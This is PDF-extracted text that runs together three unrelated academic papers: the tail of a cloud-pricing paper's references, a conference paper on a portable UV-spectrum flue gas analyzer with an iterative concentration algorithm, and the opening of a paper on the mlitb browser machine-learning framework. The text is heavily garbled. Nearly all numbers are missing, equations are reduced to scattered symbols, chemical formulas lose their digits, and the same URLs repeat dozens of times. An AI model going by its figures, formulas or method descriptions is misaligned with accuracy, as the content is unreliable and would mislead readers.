(sk a ), and suzhou regional collaborative innovation center ( szxt ). references [ ] j. mei, k. li, a. ouyang et al. “a profit maximization scheme with guaranteed quality of service in cloud computing,” in press. [ ] r. buyya, c.s. yeo, and s. venugopal, “market oriented cloud computing: vision, hype, and reality for delivering it services as computing utilities,” proc. th ieee conference on high performance computing and communications (hpcc ), dalian, china, pp. - , sep. . [ ] m. armbrust, a. fox, r. griffith, a. d. joseph, r. katz, a. konwinski,g. lee, d. patterson, a. rabkin, i. stoica, and m. zaharia. a view of cloud computing. commun. acm, ( ): – , . [ ] s. k. garg, s. versteeg, and r. buyya. a framework for ranking of cloud computing services. future gneration computer systems, : – , . [ ] amazon ec . http://aws.amazon.com/ec /instance-types/.gogrid pricing. http://www.gogrid.com/pricing. [ ] q. wang, k. ren, and x. meng. when cloud meets ebay: towards effective pricing for cloud computing. in ieee infocom, . [ ] h. xu and b. li. dynamic cloud pricing for revenue maximization. ieee transactions on cloud computing, ( ): – , july . [ ] y. feng, b. li, and b. li. price competition in an oligopoly market with multiple iaas cloud providers. ieee transactions on computers, ( ): – , jan . [ ] d. fudenberg and j. tirole, game theory, mit press, cambridge, usa, . [ ] s.y. yun, y. yi, d. h. cho, et al. the economic effects of sharing femtocells. ieee transactions on selected areas in communications, ( ): - , april. . international conference on sensor network and computer engineering (icsnce ) the portable gas analyzer based on the spectrum xu shuping school of computer science and engineering xi’an technological university xi’an , china e-mail: @qq.com; xusp @ .com xu pei school of computer science and engineering xi’an technological university xi’an , china dong qiyu school of computer science and engineering xi’an technological university xi’an , china su xiaohui school of computer science and engineering xi’an technological university xi’an , china abstract—it is a problem of spectra analysis of flue gas that how to separate and calculate the concentration of different kinds of gas from continuous mixed gas absorption spectrum signal. so based on experimental data, a new iteration of the circular algorithm is put forward on the basis of lambert-beer's law. this algorithm, using the superposition of the absorbance, makes data nonlinear fitting. it takes the advantages of the wavelength optimum and the circular iteration to distinguishing the gas mixture of different composition. experimental results show that: this method can at once calculate a variety of harmful gas concentration and accuracy up to ± %. it has strong anti-jamming capability and is suitable for practical application of engineering. keywords-circular iteration; ultraviolet spectrum; micro-spectrometer; embedded systems i. introduction with the rapid development of economic and people living standard unceasing improvement the popularity of the development of heavy industry and transportation, with a large number of harmful substances into the environment atmosphere, changed the composition of normal air, worsen air quality[ ]. health problems, which caused by the atmospheric pollution has caused governments and people of great importance to it. therefore, monitoring so and nox become one of the important subject of environmental protection[ ]. for the accurate monitoring of the real-time quality, ecological environment and pollution to the environment, to provide accurate basis for the environmental protection departments at various levels supervision, management and environment decision, urgent need a large number of modern environmental monitoring instruments. through to the present situation of flue gas analyzer in the domestic and foreign research and analysis, portable flue gas on the domestic market at present the main monitoring method is electrochemical analysis instrument, infrared gas analyzer and differential absorption spectrum. electrochemical analysis instrument each sensor can only be measured a chemical composition in flue gas, if need to measure six ingredients you need six sensors. the chemical battery principle led to zero drift in the development of the system and cross interference, sensor lifetime is also difficult to solve the problem[ ]. there is no absorption peak to no in the infrared spectrum analyzer, cannot monitor no , but can only detect the no content, through the assumptions to no concentrations. at the same time as infrared spectrum analyzer adopts wheel filter method, each time only one gas measurement, can not measure a variety of gases at the same time[ ]. differential absorption measured gas to uv and visible light waves, on the basis of the differential absorption spectrum by the strength of the differential mailto:xusp @ .com mailto:xusp @ .com international conference on sensor network and computer engineering (icsnce ) absorption spectrum inversion gas concentrations, in the traditional algorithm of differential absorption, the application of least square method of gas concentration for calculating optimal estimation equation is complex, and easy in pathological conditions[ ]. accordingly based on lambert beer law and absorbance of dual stack, a mutually recursive iteration is presented more gas concentration decoding algorithm, the process of the algorithm is presented, and verify the effectiveness of the algorithm. this system using the ocean optic micro spectrometer combining with embedded technology company has developed a set of portable flue gas analyzer[ ]. this instrument is to overcome the disadvantages of the electrochemical sensor, had been achieved and sensor life problems, and at the same time for accurate measurement of gases and no cross interference. ii. working principle of the system portable flue gas analyzer system structure consists of three parts, part data collection, data processing part and the human-computer interaction part. data acquisition part by sampling probe, flue gas sampling pump, an ultraviolet light and miniature spectrum analyzer, collecting gas mainly accomplished by ultraviolet light and miniature spectrum analyzer spectrum before and after the data is converted into digital signal transmitted to the data processing part. data processing part of arm microcontroller cpu core module and peripheral circuit, main is to electrical signals were collected by using corresponding algorithm to calculate the gas concentration of all kinds of gas in the flue gas composition. the human-computer interaction part consists of lcd display and keyboard, mainly to complete the real-time display of gas concentration, and through the keyboard to control the storage of data and related parameters settings. iii. the basic principle of loop iteration method a. lambert-beerlaw the mathematical model of lambert-beer's law [ - ] said = in the formula: a is absorbance; t is the transmittance, project the light intensity is than the incident light intensity;c is light-absorbing substance concentration; b is the absorption layer thickness. its physical meaning is: when a beam of parallel light through a vertical uniform a material suction light scattering, the absorbance and the concentration and absorption material suction light is directly proportional to the thickness. absorbance [ ] a binary additive think: if the binary and multicomponent mixture components have absorbed a wave number, the total absorbance at the wave number is equal to the arithmetic of absorbance and at all levels. b. the mathematical model the logarithmic of lambert-beer's law said: lg c r d a k s d          in the formula: a is absorbance; r is photon number (zero point); s is the number of through the photon; λ is selected for a wavelength; k is constant (associated with the length of wavelength and absorption tube); c is a single gas concentration; d is dark spectrum photon number (related to the integration time can take a fixed constant). two kinds of mixed gas lambert-beer absorbance expression can be represented as: lg r d a s d         lg r d a s d         according to the law of superposition of binary: a a a   lg lg lg r d r d r d s d s d s d                      i.e. international conference on sensor network and computer engineering (icsnce )  r d r d r d s d s d s d                      by formula ( ) can be know in a particular incident light wavelength lambda, the mixed gas of photon number and subtract its dark photons through the photon number, equal to the selected wavelength under different gas on the number of incident photons and through the photon number minus the dark photon number of the product. in the actual gas absorption model of gas absorption and scattering all play a role in the formation of spectrum, so the experiment of gas absorption spectra contain two parts. part of gas molecules on the absorption of photons, ultraviolet band is mainly caused by the electron transition of the gas molecules absorbed. another part of the scattering is gas or smoke without selective absorption caused by light attenuation. because this system adopts the removable detection method, gas extraction, you first after a pretreatment device for flue gas filtration, drying, cooling and other processing. filtration process can be . lum or above level particle filter out completely, and flue gas molecules of the diameter of the order of magnitude are below nm. instrument of the selected work between the wavelength of nm - nm, greater than the molecules or residual particle diameter, so that the gases to be detected is mainly gas molecules rayleigh scattering. the actual operation process we with nitrogen gas as zero, the spectral curve is called the zero gas, nitrogen gas molecules, although about nm - nm uv absorption, but also produces rayleigh scattering. that is zero gas line is light after zero gas scattering spectral lines. by spectrogram, found that in the absence of absorption bands, such as nitric oxide line outside the three absorption peak is coincidence with zero gas lines, namely in the absence of gas absorption bands of two gases scattering light is the same. so the rayleigh scattering of gas absorption interference can be ruled out by the method of using the zero gas line as a reference. according to the lambert beer-law, exclude mie scattering and rayleigh scattering in gas detection, then the device applicable gas absorption model becomes: ( ) ln( ) ( ( ) ) ( ) i i i l c i         which represents the light source through ( )i  zero gas scattering by spectrometer in wavelength  after the received light intensity, i ( ) represents the ith kind of gases at wavelength  absorption cross section, l is the length of the pool by absorption, and ic is the ith the concentration of the gas. which gas is equal to the total absorbance and of each gas absorption degree. iv. circular iteration steps circular iteration method using various gases in ~ nm band characteristic absorption peak, combined with the absorbance of dual stack, a feature in some gas absorption point assuming that other gas no absorption, launched the initial concentration of the gas, then switch to another characteristic absorption point, the gas absorbed photon number from the measured total absorbed photon number subtracting, get another gas initial concentration, and so on to get the initial concentration of each gas. then return to the first, the characteristics of the gas absorption point from the total number of photons absorbed minus every other gas absorption of the photon number, again to get the first gas concentration of an iteration, and so on to get other gas concentrations of an iteration, the repeated iteration until the concentration difference between two times smaller than a certain value, the concentration of each gas to the gas concentration accurately. algorithm steps are as follows. first step: to solve the first gas in the gas mixture of initial concentration c , and selects a characteristic wavelength  , under the specific wavelength of a gas in the gas mixture has obvious characteristic absorption peak, and other gas absorption peak is small at this point, is to read the value of the absorbed photon number s and solve r d s d       is obtained by absorbance look-up table and the concentration of the gas as the initial concentration of mixed gas in the gas. step : solving the second gas in the gas mixture of initial concentration: select the second characteristic wavelength in the wavelength of  second kind of gas has obvious absorption peak, and other gas absorption peak is weak, then international conference on sensor network and computer engineering (icsnce ) read the absorbed photon number s considered under the band is only two kinds of mixed gas, according to formula ( ) to calculate the second gas absorbance, look-up table against solving calculation, the second gas concentrations, as the second kind of initial concentration c of gases. step : calculating of other gases in the mixed gases, the initial concentration: the mth characteristic wavelengths selected m ,the wavelength of the first m gas has obvious absorption peak, read the wavelength of absorption of the photon number ms by formula ( ) and look-up table type inversion calculation of this kind of gas concentration as the initial concentration mc of the gas. step : iterative inversion to calculate the first gas concentration of first order recursive: will the desires of all kinds of gas concentration in formula ( ), again read  of s  , reverse the first gas concentration c of first order recursive. step : repeat the second and third step to calculate gas m first order recursive concentration mc . step : calculation of gas concentration of the adjacent two iterative error; calculating first-order differential iteration of each gas is shown in the following formula, om m c c    select  maximum of first-order differential iteration as the iteration error, i.e  max , , ,...,m m m     step : repeat the fourth, fifth and sixth step, until the iteration error is less than the given value namely. n g     step : termination of the algorithm, it will be the last time the concentration as a final concentration of gases. v. the experimental results and analysis the obtained by experiments, so , no , the no and nh four gas absorption lines as shown in figure , in the range of nm to nm, four types of gas are interfered with each other. at wavelength of ( . nnl) so and no are absorbed. also at wavelength of ( . nm) so and no are absorbed. only at wavelength of ( . nm) no , so and no are absorbed. at wavelength of ( . nm) nh 、 no and so are absorbed. the so and no have absorbed at each wavelength point, for nh and no , and, as long as the concentration of so and no first came out, and then the corresponding concentration on wavelength or of the absorbance minus the can get their absorbance. so should first of all, the concentration of so and no , then the concentration of nh and no . figure . mixed gas absorption spectrum a. calculate the concentration of so and no for the concentration of nh and no are the premise of know the concentration of so and no . however, so and no throughout the working wave band are interfered with each other, need an algorithm to eliminate their interference. here, on the basis of the look-up table using loop iteration method and calculation method to determine the concentration of so and no . figure . the absorption spectrum of so and no international conference on sensor network and computer engineering (icsnce ) as shown in figure , at the wavelength of and at the so and no were absorbed, they differ greatly in the absorption intensity at two wavelengths, the absorbance of the absorbance of no at . nm is far less than the same concentration of no in . nm, and the so absorbance at . nm is far less than the same concentration of so in the absorbance at . nm. then we can be absorbed in . nm no called the main absorption of no , no in the absorption of . nm is called so interference, so in the absorption at . nm is the main absorption, in . absorption interference on no main absorption. iterative method is through circulation calculation to gradually eliminate the interference of no on so , the true concentration approaching so and no . cyclic iteration method to overcome the conflict there understand equations caused no solution of the problem, and this method can be easily implemented by software programming. statistical chart concentrations of so and no calculated with iteration number as shown in the figure - . the abscissa is the number of iterations, the longitudinal concentration coordinates so and no (ppm). figure . the results of calculation curves of iteration number and so concentration figure . the results of calculation curves of iteration number and no concentration according to the running results and statistics can be seen in figure, the process of iteration is a successive approximation process, the calculation results of so with the increase in the number of iterations decreases gradually, and tends to be stable, but no is exactly the opposite, results with increasing iteration times increase. cyclic iterative method in two iterations later effect is not obvious, which is to say as long as two iterations. this can be calculated through no and so concentrations. b. calculate the concentration of no and nh because the no and nh absorption in the selected wavelengths of and a wavelength of does not interfere with each other, so it can be separated by the concentration of total absorbance and the so and no : calculation. hypothesis has been obtained in the mixed gas of no and so for c concentration and c concentration, the no and nh for c and c , then at the wavelength of according to the superposition of absorbance of the available, lg( ) i i a a a a a a      a is the c concentration of no absorbance at . nm, a is the c concentration of so absorbance at . nm, a is a mixture of gases in the . nm total absorbance at . nm, a is no of total absorbance. i is the spectral intensity of . nm through zero gas, i is the intensity of . nm through transmission into the mixed gas after, can be obtained directly by the spectrometer, a and a concentrations of a and no obtained by. absorbance of a so you can get the no in . nm, then according to the concentration and absorbance at . nm correspondence between the no table to calculate the concentration of no . the absorbance of a nh can be obtained with the same method in . nm, then according to the corresponding relationship between concentration and absorbance at . nm nh for nh concentration. vi. conclusion main harmful components for atmospheric environmental pollution monitoring requirements, using uv wavelength grating type continuous frequency measuring method, international conference on sensor network and computer engineering (icsnce ) precision is put forward to solve the various harmful ingredient concentration of recursive iteration fast inversion algorithm, and validates the effectiveness of the algorithm. portable flue gas analyzer based on this algorithm is based on embedded technology, sensor based on micro spectrometer data collection, using uv light source through the spectrum analysis method analysis of flue gas concentration, achieved through the use of a miniature spectrum analyzer to a variety of gas composition at the same time for the purpose of accurate measurement. the product has compact structure, high measuring accuracy, strong anti-interference, high sensitivity etc, has a broad application prospect and popularization value. acknowledgment the authors wish to thank the cooperators. this research is partially funded by the project funds in shaanxi province department of education ( jf ) and the project funds in shaanxi province department of science industrial projects( gy ). reference. [ ] zhu fa-hua, li hui, qiu shu-guang. development and application of continuous em ission monitoring technology[j]. administration and technique of environmental monitoring ( ) [ ] lei tian-xue. the present situation of the portable flue gas analyzer[j]. administration and technique of environmental monitoring. ( ) [ ] ju hui, wu yi-hui, development situation of micro spectrometers[j]. optics and precision engineering. . ( ). pp - [ ] shi baosong, sun shouhong, zhang wei.application of ccd in the portable spectrometer[j].electronic measurement technology. ( ) [ ] limited arm development guide - . arm doi. . . [ ] dong, qing. ocean wave spectrum from sar image using d-arma model.ieeeinternational geosciences and remote sensing symposium, , - [ ] chen zhi-gang. discussion on application of lambert-beer law in test [j]. acta metrologica sinica. ( ) [ ] pop, paul.embeddedsystems design:optimization challenges.lecture notes in computerscience, , ( ): - mlitb: machine learning in the browser submitted march accepted july published july corresponding author edward meeds, e.w.f.meeds@uva.nl academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright meeds et al. distributed under creative commons cc-by . open access mlitb: machine learning in the browser edward meeds, remco hendriks, said al faraby, magiel bruntink and max welling informatics institute, university of amsterdam, amsterdam, the netherlands abstract with few exceptions, the field of machine learning (ml) research has largely ignored the browser as a computational engine. beyond an educational resource for ml, the browser has vast potential to not only improve the state-of-the-art in ml research, but also, inexpensively and on a massive scale, to bring sophisticated ml learning and prediction to the public at large. this paper introduces mlitb, a prototype ml framework written entirely in javascript, capable of performing large-scale distributed computing with heterogeneous classes of devices. the development of mlitb has been driven by several underlying objectives whose aim is to make ml learning and usage ubiquitous (by using ubiquitous compute devices), cheap and effortlessly distributed, and collaborative. this is achieved by allowing every internet capable device to run training algorithms and predictive models with no software installation and by saving models in universally readable formats. our prototype library is capable of training deep neural networks with synchronized, distributed stochastic gradient descent. mlitb offers several important opportunities for novel ml research, including: development of distributed learning algorithms, advancement of web gpu algorithms, novel field and mobile applications, privacy preserving computing, and green grid-computing. mlitb is available as open source software. subjects data mining and machine learning, emerging technologies, mobile and ubiquitous computing, world wide web and web science, software engineering keywords machine learning, pervasive computing, ubiquitous computing, social computing, mobile computing, client–server systems, distributed computing, crowdsourcing introduction the field of machine learning (ml) currently lacks a common platform for the development of massively distributed and collaborative computing. as a result, there are impediments to leveraging and reproducing the work of other ml researchers, potentially slowing down the progress of the field. the ubiquity of the browser as a computational engine makes it an ideal platform for the development of massively distributed and collaborative ml. machine learning in the browser (mlitb) is an ambitious software development project whose aim is to bring ml, in all its facets, to an audience that includes both the general public and the research community. by writing ml models and algorithms in browser-based programming languages, many research opportunities become available. the most obvious is software compatibility: nearly all computing devices can collaborate in the training of ml models by contributing how to cite this article meeds et al. ( ), mlitb: machine learning in the browser. peerj comput. sci. :e ; doi . /peerj- cs. mailto:e.w.f.meeds@uva.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. figure overview of mlitb. ( ) a researcher sets up a learning problem in his/her browser. ( ) through the internet, grid and desktop machines contribute computation to solve the problem. ( ) heterogeneous devices, such as mobile phone and tablets, connect to the same problem and contribute computation. at any time, connected clients can download the model configuration and parameters, or use the model directly in their browsing environment. icon made by freepik from www.flaticon.com. some computational resources to the overall training procedure and can, with the same code, harness the power of sophisticated predictive models on the same devices (see fig. ). this goal of ubiquitous ml has several important consequences: training ml models can now occur on a massive, even global scale, with minimal cost, and ml research can now be shared and reproduced everywhere, by everyone, making ml models a freely accessible, public good. in this paper, we present both a long-term vision for mlitb and a light-weight prototype implementation of mlitb, that represents a first step in completing the vision, and is based on an important ml use-case, deep neural networks. in section ‘mlitb: vision’ we describe in more detail our vision for mlitb in terms of three main objectives: ( ) make ml models and algorithms ubiquitous, for both the public and the scientific community, ( ) create an framework for cheap distributed computing by harnessing existing infrastructure and personal devices as novel computing resources, and ( ) design research closures, software objects that archive ml models, algorithms, and parameters to be shared, reused, and in general, support reproducible research. in section ‘mlitb: prototype’ we describe the current state of the mlitb software implementation, the mlitb prototype. we begin with a description of our design choices, meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://dx.doi.org/ . /peerj-cs. including arguments for using javascript and the other modern web libraries and utilities. then we describe a bespoke map-reduce synchronized event-loop, specifically designed for training a large class of ml models using distributed stochastic gradient descent (sgd). our prototype focuses on a specific ml model, deep neural networks (dnns), using an existing javascript implementation (karpathy, ), modified only slightly for mlitb. we also report results of a scaling experiment, demonstrating the feasibility, but also the engineering challenges of using browsers for distributed ml applications. we then complete the prototype description with a walk-through of using mlitb to specify and train a neural network for image classification. mlitb is influenced and inspired by current volunteer computing projects. these and other related projects, including those from machine learning, are presented in section ‘related work.’ our prototype has exposed several challenges requiring further research and engineering; these are presented in section ‘opportunities and challenges,’ along with discussion of interesting application avenues mlitb makes possible. the most urgent software development directions follow in section ‘future mlitb development.’ mlitb: vision our long-term vision for mlitb is guided by three overarching objectives: ubiquitous ml: models can be training and executed in any web browsing environment without any further software installation. cheap distributed computing: algorithms can be executed on existing grid, cloud, etc., computing resources with minimal (and possibly no) software installation, and can be easily managed remotely via the web; additionally, small internet enabled devices can contribute computational resources. reproducibility: mlitb should foster reproducible science with research closures, univer- sally readable objects containing ml model specifications, algorithms, and parameters, that can be used seamlessly to achieve the first two objectives, as well as support sharing of ml models and collaboration within the research community and the public at large. ubiquitous machine learning the browser is the most ubiquitous computing device of our time, running, in some shape or form on all desktops, laptops, and mobile devices. software for state-of-the-art ml algorithms and models, on the other hand, are very sophisticated software libraries written in highly specific programming languages within the ml research community (bastien et al., ; jia et al., ; collobert, kavukcuoglu & farabet, ). as research tools, these software libraries have been invaluable. we argue, however, that to make ml truly ubiquitous requires writing ml models and algorithms with web programming languages and using the browser as the computational engine. the software we propose can run sophisticated predictive models on cell phones or super-computers; for the former, this extends the distributed nature of ml to a global internet. by further encapsulating the algorithms and model together, the benefit of powerful predictive modeling becomes a public commodity. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. cheap distributed computing the usage of web browsers as compute nodes provides the capability of running sophisti- cated ml algorithms without the expense and technical difficulty of using custom grid or super-computing facilities (e.g., hadoop cloud computing shvachko et al. ( )). it has long been a dream to use volunteer computing to achieve real massive scale computing. successes include seti@home (anderson et al., ) and protein folding (lane et al., ). mlitb is being developed to not only run natively on browsers but also for scaled distributed computing on existing cluster and/or grid resources and, by harnessing the capacity of non-traditional devices, for extremely massive scale computing with a global volunteer base. in the former set-up, low communication overhead and homogeneous devices (a “typical” grid computing solution) can be exploited. in the latter, volunteer computing via the internet opens the scaling possibilities tremendously, albeit at the cost of unreliable compute nodes, variable power, limited memory, etc. both have serious implica- tions for the user, but, most importantly, both are implemented by the same software. although the current version of mlitb does not provide gpu computing, it does not preclude its implementation in future versions. it is therefore possible to seamlessly provide gpu computing when available on existing grid computing resources. using gpus on mobile devices is a more delicate proposition since power consumption management is of paramount importance for mobile devices. however, it is possible for mlitb to manage power intelligently by detecting, for example, if the device is connected to a power source, its temperature, and whether it is actively used for other activities. a user might volunteer periodic “mini-bursts” of gpu power towards a learning problem with minimal disruption to or power consumption from their device. in other words, mlitb will be able to take advantage of the improvements and breakthroughs of gpu computing for web engines and mobile chips, with minimal software development and/or support. reproducible and collaborative research reproducibility is a difficult yet fundamental requirement for science (mcnutt, ). reproducibility is now considered just as essential for high-quality research as peer review; simply providing mathematical representations of models and algorithms is no longer considered acceptable (stodden, guo & ma, ). furthermore, merely replicating other work, despite its importance, can be given low publication priority (casadevall & fang, ) even though it is considered a prerequisite for publication. in other words, submissions must demonstrate that their research has been, or could be, independently reproduced. for ml research there is no reason for not providing working software that allows reproduction of results (for other fields in science, constraints restricting software publication may exist). currently, the main bottlenecks are the time cost to researchers for making research available, and the incompatibility of the research (i.e., code) for others, which further increases the time investment for researchers. one of our primary goals for mlitb is to provide reproducible research with minimal to no time cost to both the meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. primary researcher and other researchers in the community. following (stodden, borwein & bailey, ), we support “setting the default to reproducible.” for ml disciplines, this means other researchers should not only be able to use a model reported in a paper to verify the reported results, but also retrain the model using the reported algorithm. this higher standard is difficult and time-consuming to achieve, but fortunately this approach is being adopted more and more often, in particular by a sub-discipline of machine learning called deep learning. in the deep learning community, the introduction of new datasets and competitions, along with innovations in algorithms and modeling, have produced a rapid progress on many ml prediction tasks. model collections (also called model zoos), such as those built with caffe (jia et al., ) make this collaboration explicit and easy to access for researchers. however, there remains a significant time investment to run any particular deep learning model (these include compilation, library installations, platform dependencies, gpu dependencies, etc.). we argue that these are real barriers to reproducible research and choosing ubiquitous software and compute engines makes it easier. for example, during our testing we converted a very performant computer vision model (lin, chen & yan, ) into json format and it can now be used on any browser with minimal effort. javascript object notation json.org/. in a nod to the concept of closures concept common in functional programming, our approach treats a learning problem as a research closure: a single object containing model and algorithm configuration plus code, along with model parameters that can be executed (and therefore tested and analyzed) by other researchers. mlitb: prototype the mlitb project and its accompanying software (application programming interfaces (apis), libraries, etc.) are built entirely in javascript. we have taken a pragmatic software development approach to achieve as much of our vision as possible. to leverage our software development process, we have chosen, wherever possible, well-supported and actively developed external technology. by making these choices we have been able to quickly develop a working mlitb prototype that not only satisfies many of our objectives, but is as technologically future proof as possible. to demonstrate mlitb on a meaningful ml problem, we have similarly incorporated an existing javascript implementation of a deep neural network into mlitb. the full implementation of the mlitb prototype can be found on github (https://github.com/software-engineering-amsterdam/mlitb). why javascript? javascript is a pervasive web programming language, embedded in approximately % of web-sites (w techs, ). this pervasiveness means it is highly supported (can i use, ), and is actively developed for efficiency and functionality (chrome v , ; asm.js, ). as a result, javascript is the most popular programming language on github and its popularity is continuing to grow (ray et al., ). the main challenge for scientific computing with javascript is the lack of high-quality scientific libraries compared to platforms such as matlab and python. with the potential of native computational efficiency (or better, gpu computation) becoming available meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb https://github.com/software-engineering-amsterdam/mlitb http://dx.doi.org/ . /peerj-cs. for javascript, it is only a matter of time before javascript bridges this gap. a recent set of benchmarks showed that numerical javascript code can be competitive with native c (khan et al., ). general architecture and design design considerations the minimal requirements for mlitb are based on the scenario of running the network as public resource computing. the downside of public resource computing is the lack of control over the computing environment. participants are free to leave (or join) the network at anytime and their connectivity may be variable with high latency. mlitb is designed to be robust to these potentially destabilizing events. the loss of a participant results in the loss of computational power and data allocation. most importantly, mlitb must robustly handle new and lost clients, re-allocation of data, and client variability in terms of computational power, storage capacity, and network latency. although we are agnostic to the specific technologies used to fulfill the vision of mlitb, in practice we are guided by both the requirements of mlitb and our development con- straints. therefore, as a first step towards implementing our vision, we chose technology pragmatically. our choices also follow closely the design principles for web-based big data applications (begoli & horey, ), which recommend popular standards and light-weight architectures. as we will see, some of our choices may be limiting at large scale, but they have permitted a successful small-scale mlitb implementation (with up to clients). figure shows the high-level architecture and web technologies used in mlitb. modern web browsers provide functionality for two essential aspects of mlitb: web workers (w c, ) for parallelizing program execution with threads and web sockets (ietf, ) for fast bi-directional communication channels to exchange messages more quickly between server and browser. to maintain compatibility across browser vendors, there is little choice for alternatives to web workers and web sockets. these same choices are also used in another browser-based distributed computing platform (cushing et al., ). on the server-side, there are many choices that can be made based on scalability, memory management, etc. however, we chose node.js for the server application (http:/ /nodejs.org). node.js provides several useful features for our application: it is lightweight, written in javascript, handles events asynchronously, and can serve many clients concurrently (tilkov & vinoski, ). asynchronous events occur naturally in mlitb as clients join/leave the network, client computations are received by the server, users add new models and otherwise interact with the server. since the main computational load is carried by the clients, and not the server, a light-weight server that can handle many clients concurrently is all that is required by mlitb. design overview the general design of mlitb is composed of several parts. a master server hosts ml problems/projects and connects clients to them. the master server also manages the main event loop, where client triggered events are handled, along with the reduce steps meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://nodejs.org http://dx.doi.org/ . /peerj-cs. figure mlitb architecture and technologies. ( ) servers are node.js applications. the master server is the main server controlling communication between clients and hosts ml projects. ( ) communication between the master server and clients occurs over web sockets. ( ) when heterogeneous devices connect to the master server they use web workers to perform different tasks. upon connection, a ui worker, or boss, is instantiated. web workers perform all the other tasks on a client and are controlled by the boss. see fig. for details. ( ) a special data worker on the client communicates with the data server using xhr. ( ) the data server, also a node.js application, manages uploading of data in zip format and serves data vectors to the client data workers. icon made by freepik from www.flaticon.com. of a (bespoke) map-reduce procedure used for computation. when a browser (i.e., a heterogeneous device) makes an initial connection to the master server, a user-interface (ui) client (also known as a boss) is instantiated. through the ui, clients can add workers that can perform different tasks (e.g., train a model, download parameters, take a picture, etc.). an independent data server serves data to clients using zip files and prevents the master server from blocking while serving data. for efficiency, data transfer is performed using xhr. trained models can be saved into json objects at any point in the training xmlhttprequest www.w .org/tr/ xmlhttprequest. process; these can later be loaded in lieu of creating new models. master server the master node (server) is implemented in node.js with communication between the master and slave nodes handled by web sockets. the master server hosts multiple ml meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.flaticon.com http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w .org/tr/xmlhttprequest http://www.w 